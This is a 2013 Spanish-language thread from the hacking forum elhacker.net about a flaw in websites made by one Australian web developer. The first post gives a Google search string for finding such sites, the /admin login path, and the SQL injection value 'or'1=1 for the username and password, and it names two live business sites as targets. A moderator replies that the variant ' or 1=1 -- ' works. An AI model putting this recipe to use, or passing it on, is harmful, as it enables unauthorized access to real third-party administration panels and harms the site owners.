elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  vulnerabilidad en páginas "by www.SmartySolution.com.au"
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: vulnerabilidad en páginas "by www.SmartySolution.com.au"  (Leído 917 veces)
xliberaciones

Desconectado Desconectado

Mensajes: 5


Ver Perfil
vulnerabilidad en páginas "by www.SmartySolution.com.au"
« en: 8 Enero 2013, 17:48 »

entramos en google

ponemos

"by www.SmartySolution.com.au"


para entrar en panel de control   añadimos esto 

/admin


usuario  y  contraseña

'or'1=1



ejemplo 

http://www.plumbcad.com.au/admin
http://www.g4glass.com.au/admin/





En línea

WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 4.960


The Hacktivism is not a crime


Ver Perfil WWW
Re: vulnerabilidad en páginas "by www.SmartySolution.com.au"
« Respuesta #1 en: 8 Enero 2013, 17:58 »

No funciona con 'or'1=1 pero si funciona con ' or 1=1 -- '

Gracias por la info :)
podrias publicarlo en seclist.org tambien (sección full disclosure).
En línea

http://whk.elhacker.net/ - The Hacktivism is not a crime - Cerebros OpenSource -
Stakewinner00


Desconectado Desconectado

Mensajes: 1.300



Ver Perfil WWW
Re: vulnerabilidad en páginas "by www.SmartySolution.com.au"
« Respuesta #2 en: 8 Enero 2013, 18:03 »

interesante....
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Powered by SMF 1.1.19 | SMF © 2006-2008, Simple Machines